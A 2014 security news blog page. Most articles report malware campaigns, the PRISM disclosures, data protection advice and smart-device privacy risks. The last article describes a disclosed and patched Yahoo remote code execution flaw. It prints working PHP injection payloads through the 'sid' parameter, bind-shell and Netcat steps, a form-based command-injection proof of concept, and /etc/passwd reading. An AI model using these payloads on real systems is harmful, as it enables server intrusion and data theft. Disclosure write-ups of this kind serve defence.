Tuesday, 28 January 2014

Governments warned of email malware threat after Israel computer hack

Hackers successfully hijacked 15 Israeli Defense Ministry computers using targeted malware, according to security firm Seculert. The incident underlines the growing to governments from determined attackers.
Seculert chief technology officer Aviv Raff confirmed the attack during an interview with Reuters. He said the attackers infected the machines using malware-laden email messages.
The messages were reportedly laced with the infamous Xtreme RAT remote access Trojan and were designed to look like they came from Israel's anti-terrorist Shin Bet secret security agency.
Raff said despite successfully sinkholing the attacks, the company is yet to discover what the hackers did after the breach.
He added that the potential damage could be huge as the attackers managed to compromise a machine in the ministry's Civil Administration. This division monitors the movement of goods and people between Israel and the West Bank and Gaza.
The Xtreme RAT malware grants hackers complete control of an infected machine. It lets them execute a variety of commands that can mine data from the machine, or use it as an access point to get further into the victim's network and systems, for example.
It is currently unclear who mounted the attack, though Raff said early evidence suggests a Palestinian group is responsible. At the time of publishing Seculert and the Israeli Department of Defense had not responded to V3's request for a response to Raff's comments.
Security vendors said that the nature of the attack should serve as a warning to other government agencies around the world. Vice president of Global Accounts at Good Technology, Phil Barnett, noted it could have easily been a UK defence agency that fell victim.
"This could just as easily happen to a UK company or agency, or anywhere in the world. Location doesn't matter. It's all about understanding and protecting access points. The better visibility and control that a company has over all of its external access points, the better it can protect against attacks such as these," he said.
FireEye chief technology officer Greg Day warned businesses and government departments to expect further attacks of a similar nature.
"It's no great surprise that email is believed to be the method of infiltration. Whilst we build greater defensive controls, attacks are smart enough to recognise the communications we allow and then exploit the weakness that is hardest to fix: humans," he said.
"We do see such attacks occurring on an all too regular basis and what is key is the timely discovery and containment of such attacks. Organisations will continually be targeted, whether it is from hobbyists, who simply want to see if they are smart enough to get in, through to competing nations looking for intelligence."
State-sponsored cyber attacks are a growing threat facing the public and private sector. Security researchers from CrowdStrike reported a state-sponsored Russian hack campaign targeting the energy sector, codenamed Energetic Bear.

Windows banking Trojan jumps to target Android

Android logo
Malware capable of infecting Android handsets using Windows PCs and laptops has been uncovered targeting developers.
Security response manager at Symantec Alan Neville told V3 the malware is atypical as it uses a two-stage attack process to jump from Windows PCs to Android handsets.
"It starts with a Trojan that when executed creates a new service on a Windows machine," he said. "It then targets Android devices that connect on USB. It uses the Android debugging bridge to deliver the Fakebank Trojan."
Fakebank is a notorious Trojan designed to take victims' financial data. Neville explained: "It looks for a specific set of Korean banking applications. If these are found the Trojan asks the user to install an update. When this notification is clicked it actually downloads a malicious version of the app."
Neville added that the Trojan is particularly nasty as it also has remote SMS message-monitoring capabilities. He said the complex nature of the attack indicates that the campaign is designed to target developers.
"The attack uses a new method that is quite complex. Because it uses the Android Debug Bridge, a mode that requires the user to activate it before connecting it via USB, its reach is quite limited and it is only really a threat to people like developers," he said.
F-Secure security analyst Sean Sullivan agreed, arguing that while the infection method is atypical, the more concerning element is the way the malware dupes users to download the malicious payload.
"Banking Trojans have been cross-platform for a while now, but not via a connected cable. They've used social engineering, injecting a request for phone model or number into the compromised Windows-based banking session," he told V3.
"To me, the more worrying thing about this particular Korean campaign is that the malicious app is prompting victims to replace mobile banking apps with counterfeits."
Trojans are a growing problem facing Android users. Thanks to the platform's open nature it is fairly easy for criminals to target Android, letting them load and distribute malicious applications onto third-party stores without scrutiny.
Cisco estimated that 99 percent of all mobile malware is designed to target the Android ecosystem in its latest threat report, released earlier in January.

V3 Storage Summit: ICO warns firms of storage security issues to avoid £500,000 fine

padlock laptop
The Information Commissioner’s Office (ICO) has urged businesses to ensure they consider all possible issues that could affect data storage, to ensure they avoid falling foul of the Data Protection Act and paying a fine of up to £500,000.
Speaking to V3, group manager for technology at the ICO Simon Rice said trends such as cloud computing, bring your own device and mobile device use mean there is more to consider than ever before with data storage.
“Breaches are happening and there is no reason to suggest that, as people become more mobile or use different devices, those kinds of breaches will stop occurring. In fact they may well increase,” he said.
“The theft of devices is horrendous if you look at the number of iPhones stolen in London on a daily basis for example. These things will happen to your organisation and it’s not a matter of just thinking ‘we’ll be fine’, but about being prepared.”
In particular, Rice cited the age-old issue of encryption as a good first measure that firms must consider when assessing their data storage requirements.
“Data storage issues around laptops, USBs, mobiles and tablets features heavily in our work and in many cases it could easily be avoided if data was encrypted. It’s not the be all and end all, but it is a good first step,” he said.
Rice added that education and user awareness is also vital. “You need to explain to employees what the risks are of using devices for storing work data or working from home and how they are accessing data.”
Ultimately firms must accept that dealing with data storage in the current era, from a security point of view, is not easy and requires hard work.
“Organisations need to appreciate that technology is difficult and that the marketing tells you it’s great, and in many ways it is, but it’s not something you can just forget about,” he said.
“It’s like having a company car. You wouldn’t have that serviced once and never looked at again: you’d get it looked at regularly. Security tools and policies need the same approach to make sure it’s working for you and your staff.”
The warnings come as organisations of all types continue to fall foul of data protection regulations. The ICO reprimanded the Royal Veterinary College when an employee lost passport photos stored on their own digital camera.
Another incident saw a sole trader fined £5,000 for failing to encrypt data stored on a hard drive that was stolen from the boot of a car while it had stopped at traffic lights. The variety of the incidents underlines the need for businesses to consider storage issues from every possible angle.

Microsoft sheds light on data theft after employee phishing scams

Security threats - password theft
Microsoft has admitted that a number of legal documents were stolen during recent phishing attacks on its staff and company accounts.
The firm has been hit repeatedly by the Syrian Electronic Army in recent weeks, with both Microsoft's blogs and Skype accounts hit during the attacks.
The company has now provided more insight into the effect of these attacks, with Adrienne Hall, general manager for Trustworthy Computing Group, explaining in a blog post that it would be talking to those affected as more information comes to light.
"We have learned that there was unauthorised access to certain employee email accounts, and information contained in those accounts could be disclosed. It appears that documents associated with law enforcement inquiries were stolen," she wrote.
"If we find that customer information related to those requests has been compromised, we will take appropriate action. Out of regard for the privacy of our employees and customers – as well as the sensitivity of law enforcement inquiries – we will not comment on the validity of any stolen emails or documents."

Hall also confirmed that Microsoft is stepping up its efforts to beat cyber criminals, including better staff training and awareness of the threats they face.
"We continue to further strengthen our security," she said. "This includes ongoing employee education and guidance activities, additional reviews of technologies in place to manage social media properties, and process improvements based on the findings of our internal investigation."
The incident underlines the perils facing busineses of all sizes – and the need for strong passwords and staff education – with even a tech giant such as Microsoft caught out by cyber attacks and phishing scams.

US government declassifies some NSA PRISM data

An eye in close-up superimposted by a screen of random numbers
The US Department of Justice (DoJ) has moved to let communications providers publicly disclose what data the National Security Agency (NSA) took during its PRISM operations.
Attorney general Eric Holder and the director of National Intelligence James Clapper announced the DoJ's plans in a joint statement on Monday, addressing public distrust of the government and businesses following the scandal.
"Permitting disclosure of this aggregate data resolves an important area of concern to communications providers and the public," read the statement.
"While this aggregate data was properly classified until today, the office of the director of National Intelligence, in consultation with other departments and agencies, has determined that the public interest in disclosing this information now outweighs the national security concerns that required its classification."
News of the PRISM scandal broke 2013 when whistleblower Edward Snowden leaked classified documents to the media proving that the NSA was siphoning vast amounts of customer data from numerous companies including, Microsoft, Google, Facebook, Yahoo, Twitter and Apple.
The revelation caused concerns about the US companies involved in the PRISM campaign, leading key players including Microsoft, Google, Facebook, Apple and Yahoo to demand permission to be more open about their involvement.
The companies issued a joint statement on Tuesday welcoming the declassification but they argued more work still needs to be done to ensure another spying scandal does not occur.
"We filed our lawsuits because we believe that the public has a right to know about the volume and types of national security requests we receive. We're pleased the Department of Justice has agreed that we and other providers can disclose this information," said the joint statement.
"While this is a very positive step, we'll continue to encourage congress to take additional steps to address all of the reforms we believe are needed."
The declassification is the first step in a wider set of reforms announced by president Barack Obama earlier in January. The DoJ confirmed that the reforms will allow companies to disclose key information.
"More detailed disclosures about the number of national security orders and requests issued to communications providers, and the number of customer accounts targeted under those orders and requests including the underlying legal authorities."
However, in a notable caveat, the DoJ said any PRISM data that remains central to US national security will remain classified.
The statement also indicated that the DoJ will implement other measures outlined in Obama's speech, but failed to disclose the exact details or timeframe.
"Through these new reporting methods, communications providers will be permitted to disclose more information than ever before to their customers. In the weeks ahead, additional steps must be taken in order to fully implement the reforms directed by the president," read the statement.
Many commentators have argued that the reforms outlined by Obama do not do enough to curtail European businesses' concerns.

V3 Storage Summit: CIOs need to prepare data reserves for BYOD revolution

iPad Air vs Nexus 10 stacked
Businesses need to prepare their systems to monitor and track data passing through and being stored on consumer-focused devices, such as Android smartphones, if they want to keep their corporate data safe from hackers, according to security firm Lookout.
Principal security engineer at Lookout Timothy Wyatt told V3 the number of threats targeting mobile devices is increasing.
"We see a high propensity of attacks targeting our user base every day. The range of attack type varies substantially. It ranges from basic toll fraud scams, that force the mobile to send messages to premium-rate numbers, to apps capable of opening up backdoors," he said.
Wyatt added that, if left unchallenged, hackers could develop attacks that use smartphones as a point of entry to businesses' main data reserves.
"We haven't seen hackers using smartphones as an entry point into corporate networks yet, but it is definitely possible," he said.
"Even in corporate environments where proper safeguards should be in place, if devices connecting to the network aren't being checked, they're presenting an opportunity for hackers."
Wyatt said businesses must start putting smart devices, such as phones and tablets, through the same scrutiny as PCs to deal with the increased threat.
"As a general lay of the land businesses need to start treating mobile devices like any other device. They should know who and what is connecting and keep a full itinerary of what data they're accessing, storing and sending," he said.
Wyatt added that the use of cloud services for storing data is a particularly dangerous practice as information stored on a phone can present an opportunity for hackers. "Email is a good example of the danger as usually it's full of sensitive information," he said.
"One of the biggest concerns is it could lead into cloud services, things like Dropbox and Box. The threat is just as true on mobile devices as it is on PCs."
The Lookout engineer said businesses should also invest in resources to educate their workforces about cyber security best practice.
"Having a policy in place that gets all employees to have passcodes on their devices is a good idea," he said.
"It's also important to make sure people have situational awareness – that they think and know about what they're doing, where they're getting apps from, what attachments they're opening."
Telecoms giant Cisco estimated that 99 percent of all mobile malware is designed to target Android in its latest threat report.

PRISM: NSA and GCHQ caught spying on Angry Birds players

Leaked documents have emerged claiming the US National Security Agency (NSA) and the UK Government Communications Headquarters (GCHQ) are using mobile applications such as Angry Birds to spy on citizens.
The Guardian reported uncovering the spy operations while examining documents leaked to it by controversial whistleblower Edward Snowden. The campaigns reportedly used the applications as an entry point into smart devices, going on to gather vast amounts of information about their owner.
The agencies' spy campaigns are reportedly so advanced that they could discern the phone's model and screen size as well as personal details about its owner including their age, gender and location.
The scale of data gathering is unclear, but a leaked document from the NSA detailed a "golden nugget" scenario where its analysts could use mobile applications as a gateway to collect information from connected networks, downloaded documents, websites visited and friend lists.
Another leaked GCHQ document from 2010 indicated that the campaigns were collecting so much data, they were struggling to store it.
The document also showed that the GCHQ codenamed its mobile spy tools after characters from The Smurfs TV series. These included a "Nosey Smurf" tool that let GCHQ agents hijack control of the phone's microphone to record conversations, a "Tracker Smurf" tool that let the GCHQ remotely collect the phone's location data and "Paranoid Smurf" tool designed to hide the agency's activities from the user.
The Guardian reported that the NSA and GCHQ plan to continue developing and enhancing their mobile spying powers, though the details of how remain unknown. At the time of publishing the GCHQ had not responded to V3's request for comment on the leaked documents.
An NSA spokesman moved to downplay the significance of the campaign in an emailed statement to V3, promising that it only targeted a very specific set of people.
"The communications of people who are not valid foreign intelligence targets are not of interest to the National Security Agency," read the statement.
"Any implication that NSA's foreign intelligence collection is focused on the smartphone or social media communications of everyday Americans is not true. Moreover, NSA does not profile everyday Americans as it carries out its foreign intelligence mission. We collect only those communications that we are authorised by law to collect for valid foreign intelligence and counterintelligence purposes – regardless of the technical means used by the targets."
The spokesman added that the NSA also proactively works to delete any data it accidentally collects from an innocent phone user.
"In addition, NSA actively works to remove extraneous data, to include that of innocent foreign citizens, as early as possible in the process. Continuous and selective publication of specific techniques and tools lawfully used by NSA to pursue legitimate foreign intelligence targets is detrimental to the security of the United States and our allies – and places at risk those we are sworn to protect."
But the revelation has led to a backlash within the app development community. CEO of Rovio Entertainment – the company that makes Angry Birds – Mikael Hed, said the company has never intentionally aided the NSA and is considering altering its software to help protect its customers.
"We do not collaborate, collude, or share data with spy agencies anywhere in the world. As the alleged surveillance might be happening through third-party advertising networks, the most important conversation to be had is how to ensure user privacy is protected while preventing the negative impact on the whole advertising industry and the countless mobile apps that rely on ad networks," he said.
"In order to protect our end users, we will, like all other companies using third-party advertising networks, have to re-evaluate working with these networks if they are being used for spying purposes."
The Guardian is one of a select few publications with direct access to the PRISM files, which were originally leaked in 2013. The documents led to several revelations about the NSA and GCHQ's spy operations. The NSA was revealed to be collecting and analysing as many as 200 million text messages a day earlier in January.
US president Barack Obama announced a series of sweeping reforms designed to more strictly control how the NSA can conduct its spy operations earlier in January.
The US government implemented the first of these on Monday, allowing technology companies disclose to the public non-critical information about their involvement in operations such as PRISM.

PRISM: Apple received almost 1,000 data requests in 2013

Apple holding page before live streaming event
Apple received 927 data requests from US law enforcement and intelligence agencies from January to June 2013.
The iPhone maker revealed the figure in a statement, confirming that it handed over data in 81 percent of cases. The company said the requests generally related either to matters of national security or criminal investigations, and that any information handed over was tailored to the exact needs of the agency.
"Law enforcement requests most often relate to criminal investigations such as robbery, theft, murder and kidnapping," read the statement.
"This data represents every US national security order for data about our customers regardless of geography. We did not receive any orders for bulk data. Apple reviews each order, whether criminal or under a national security authority, to ensure that it is legally issued and as narrowly tailored as possible."
The requests related to 2,330 Apple accounts, though the company claims it only handed over information from 747 of these. It also showed that Apple objected to 102 of the account requests.
The news comes just after the US Department of Justice (DoJ) ruled to declassify a number of PRISM operation details. The DoJ moved to let companies including Apple disclose non-critical information to the public about their roles in operations such as PRISM on Monday.
The move is an opening step in a wider sweep of reforms regarding how US intelligence agencies, such as the NSA, can collect data. The reforms were detailed by president Barack Obama in a speech earlier in January.
Apple said it is working with the White House and US attorney general to be even more open about its involvement with government agencies and to protect its customers' data.
"Apple has been working closely with the White House, the US attorney general, congressional leaders and the Department of Justice to advocate for greater transparency with regard to the national security orders we receive," read the statement.
"We believe strongly that our customers have the right to understand how their personal information is being handled, and we are pleased the government has developed new rules that allow us to more accurately report law enforcement orders and national security orders in the US."
Apple claimed it has already taken proactive steps to protect its customers. "Personal conversations are protected using end-to-end encryption over iMessage and FaceTime, and Apple does not store location data, Maps searches, or Siri requests in any identifiable form," the firm said.
Apple is one of many companies battling to disclose the details of its involvement in PRISM. The PRISM scandal originally broke in 2013 when ex-CIA analyst Edward Snowden leaked documents to the press proving that the NSA was collecting vast amounts of customer data from numerous technology companies including Microsoft, Apple and Google.

These Devices May Be Spying On You (Even In Your Own Home)

Think you are safe in your own home? These innocent-looking devices may be spying on you, or performing other nefarious actions:
Your Television  
Televisions may track what you watch. Some LG televisions were found to spy on not only what channels were being watched, but even transmitted back to LG the names of files on USB drives connected to the television. Hackers have also demonstrated that they can hack some models of Samsung TVs and use them as vehicles to capture data from networks to which they are attached, and even watch whatever the cameras built in to the televisions see.
Your Kitchen Appliances
Many recent-generation kitchen appliances come equipped with connectivity that allows for great convenience, but this benefit comes at a price – potential spying and security risks. Information about when you wake up in the morning (as extrapolated from data on your Internet-connected coffee maker) and your shopping habits (as determined by information garnered from your smart fridge) can help robbers target your home. Furthermore, potential vulnerabilities have been reported in smart kitchen devices for quite some time, and less than a month ago a smart refrigerator was found to have been used by hackers in a malicious email attack. You read that correctly – hackers successfully used a refrigerator to send out malicious emails.
Your DVR/Cable-Box/Satellite-TV Receiver
Providers of television programming can easily track what you are watching or recording, and can leverage that information to target advertisements more efficiently. Depending on service agreements, providers could potentially even sell this type of information to others, and, of course, they are likely to furnish this information to the government if so instructed.
Your Modem (and Internet Service Provider)
If it wanted to, or was asked by the government to do so, your ISP could easily compile a list of Internet sites with which you have communicated. Even if the providers themselves declined to spy as such, it may be possible for some of their technical employees to do so. Worse yet, since people often subscribe to Internet service from the same providers as they do television service, a single party may know a lot more about you then you might think.
Spy vs Sci 567
Your Smartphone
Not only may your cellular provider be tracking information about you – such as with whom you communicate and your location – but it, as well as Google (in the case of Android), Apple (in the case of iPhones), or other providers of software on the device, may be aware of far more detailed actions such as what apps you install and run, when you run them, etc. Some apps sync your contacts list to the providers’ servers by default, and others have been found to ignore privacy settings. Phones may even be capturing pictures or video of you when you do not realize and sending the photos or video to criminals!
Your Webcam or Home Security Cameras
On that note, malware installed on your computer may take control of the machine’s webcam and record you – by taking photos or video – when you think the camera is off. Miss Teen USA was allegedly blackmailed by a hacker who took control of her laptop’s webcam and photographed her naked when she thought the camera was not on. Likewise, malware on computers or hackers operating on those machines could potentially intercept transmissions from security cameras attached to the same network as the devices (some cameras transmit data unencrypted), and copy such videos for their own systems. Such information is invaluable to burglars.
Your Telephone
It is common knowledge that the NSA has been tracking people’s calls, and even the changes proposed by President Obama won’t truly eliminate the spying. Of course, phone companies also track phone calls as they need call information for their billing systems. So, even if you use an old, analog phone your calls may be tracked. If you are receiving phone service from the same provider as you get your Internet and/or television service, phone records are yet another element of information that a single party knows about you.
Your Lights, Home Entertainment System, and Home Alarm System
Various newer lighting, home entertainment, and home security systems can be controlled via Wi-Fi or even across the Internet. Remote control is a great convenience, but it also raises questions as to whether information is reported to outside parties. Does your alarm provider get notified every time you come and go? Is information about your choice of audio entertainment relayed to manufacturers of the equipment on which it is played or the supplier of the music? Could hackers gather information from smart lighting, entertainment, or security devices – or the networks on which they communicate – to determine patterns of when you are home, when you are likely to have company over, and when your house is empty?
Your Thermostat (Heat and/or Air Conditioning)
Various Internet-connected thermostats are now available. They provide great convenience, but might they also be transmitting information about your preferences to others? Google’s acquisition of Nest has raised interest in this issue – but Nest is not the only provider of such technology. There are even products distributed by utilities that raise concerns. In my area, for example, the utility company offers a discount to people who install a thermostat that allows the utility to remotely cycle air conditioning on and off in case of excessive power demand. Might that thermostat – or future generations of it – also report information to the utility company?
Your Laundry Equipment
Like kitchen appliances, washers and dryers that connect to the Internet may report information that users may not realize is being shared, and that if intercepted, or misused, could help criminals identify when you are home and when you are not.
Your Medical Devices
It is not news that pacemakers, insulin pumps, and other medical devices can be hacked. But even normal functioning devices may spy on you. Various pacemakers relay patient status information over the Internet – this may be valuable in some cases, but also creates risks. Could unauthorized parties obtain information from such data in transmit? What if a criminal sent out phony “pacemaker impersonating” messages stating that a patient is in distress in order to have his physician instruct him to go to the hospital – and leave his home vulnerable?
Your iPod or Other Entertainment Devices
Yes, there are still millions of people using specialized non-phone-equipped electronic devices, but these devices are often Wi-Fi enabled and pose similar to risks to smartphones as discussed above. Of course if you are reading books or magazines, watching videos, or listening to audio supplied by an online provider, your choices and preferences are likely being tracked.
Coming Soon… Your Handgun
Millions of Americans keep guns in their homes, so privacy issues surrounding firearms are an issue regardless of one’s position in the perpetual American debate about gun control. In the near future so-called “smartguns” – firearms that contain computers with various safety capabilities intended to prevent accidents and curtail unauthorized use – are expected to enter the market. But, will the embedded computers also spy on the firearms’ owners? Do the guns contain circuitry that might allow law enforcement to track – or even to disable – the weapons? It is hard to imagine that governments would not be interested in adding such “features” to weapons; the US government is alleged to have installed malware onto thousands of networks and placed spy chips into computers, and known to have lost track of weapons it intended to monitor. Would the government really treat firearms as being less worthy of spied upon than telephones?
Vendors may attempt to address some of the aforementioned concerns, but many of the issues are sure to remain for quite some time. So, if you want to take advantage of the benefits of connectivity and smart devices, keep in mind the privacy risks and act accordingly.

Google dares hackers to hack Chrome OS - and will pay $2.71828 million as reward

Rarely do you find a company that puts itself in the crosshairs of hackers, especially when you know there are some *very* talented ones out there (remember Anonymous?). In a time where companies try to stay out of the limelight, Google is doing the exact opposite - and for the fourth time, in fact.
Google is offering $2.71828 million for hackers who manage to hack into Chrome OS, in their annual security competition event, Google Pwnium. The number itself is a geek joke, actually - it's the mathematical constant 'e', which programmers use when writing algorithms. Translated into local numbers, that's RM9million / SGD3.5 million / P123 million.
Why is Google doing this, you ask? According to their blog announcement, they want to plug all security holes in their system, and learn from 'security researchers' (which I suppose is a nicer way to call hackers). It's a bold approach, but it's a fantastic way to ensure their software is truly secure (as opposed to Microsoft Windows and Internet Explorer, which had numerous security loopholes for years).
If you're a 'security researcher' who's keen on taking up Google's challenge, e-mail security@chromium.org to register. Registration will close at 5:00 p.m. PST Monday, March 10th, 2014 (9am Tuesday for us in SEA). Official rules here.

Discovered a Remote Command Execution Vulnerability in Yahoo!

The cyber security expert Ebrahim Hegazy has found a Remote Code Execution vulnerability in a Yahoo server hosting numerous sub-domains.

The cyber security expert Ebrahim Hegazy has found a serious flaw, as explained by the analyst the website is affected by a Remote Code Execution vulnerability. During the test Hegazy discovered first a Remote PHP Code Injection vulnerability that later escalated to “Remote Command Execution”. The hacker found the vulnerability at the link
that refers a Yahoo! server which hosts numerous subdomains of the company. The payload used to exploit the flaw was
What is “Remote PHP Code Injection” ? A PHP Code Injection flaw allows an attacker to execute PHP code such as system(“id”) or any other php function/code, it occurs when user  sends untrusted data to the target through (GET/POST) values of the parameters that are reflected inside eval() function. Ebrahim Hegazy succeeded to inject PHP code by manipulating the value of the parameter sid”, in the beginning he tried to check the directories and files by dir using the SYSTEM function: http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“dir”))} Yahoo server hacked He also tried with system(“ls -la”) but he noted that the target doesn’t accept any spaces in the URL. The expert decided to try to use URL ENCODING for space character using %20 but without success, same result with double URL encoding.
E.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“ls%20-la”))}
He also tried to circumvent the security feature by using the function file_get_contents(“http://sec-down.com/poc.txt”) but also this test doesn’t work because of the folder permissions. Finally Ebrahim tried the following procedure:
  • Upload of “bind.sh” which is a bind connection script, into /tmp directory
  • Execute it to make a bind connection with the server
  • E.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“./tmp/bind.sh”))}
  • Receive the connection from the server on Netcat and now I will be free to run whatever Commands
The expert knowing that Netcat could trigger defense systems, including any simple AV/IDS on the target he tried another method for the attack. Thanks to Ahmed Abul-Ela and Ibrahim Mosaad he was able to execute commands using system($_POST['x2']) POC:
<form method=”POST” action=”http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_POST['x2']))}“>
 <input type=”text” name=”x2″>
 <input type=”submit”></form>
Also by using  system($_SERVER['HTTP_USER_AGENT']) and then inject my commands inside the userAgent. E.g, http://tw.user.mall.yahoo.com/rating/list?sid=${@print($_SERVER['HTTP_USER_AGENT'])} He noted that there have been other good tricks such as using readfile(“/etc/passwd”). Sample POC for the Vulnerability [Allowed by Yahoo! to be public]:
Timeline of the Flaw Remote Command Execution Vulnerability in Yahoo!
  • Jan 20, 2014 at 6:39 PM – Intial Report to Yahoo! Security Team.
  • Jan 20, 2014 at 6:56 PM – Update 1 sent to Yahoo! that server kernel was old one with a well known “Local Privilage Esclation” vulnerability which means an attacker with such vulnerability can gain ROOT ACCESS to the server!!!!
  • Jan 21, 2014 at 6:44 PM – Yahoo! Acknowledged the vulnerability and pushed a Fix for it.
Thanks to Yahoo! Security team for the fast fix release, BTW No news about the bounty yet! Pierluigi Paganini (Security Affairs –  Remote Command Execution Vulnerability, Yahoo, hacking)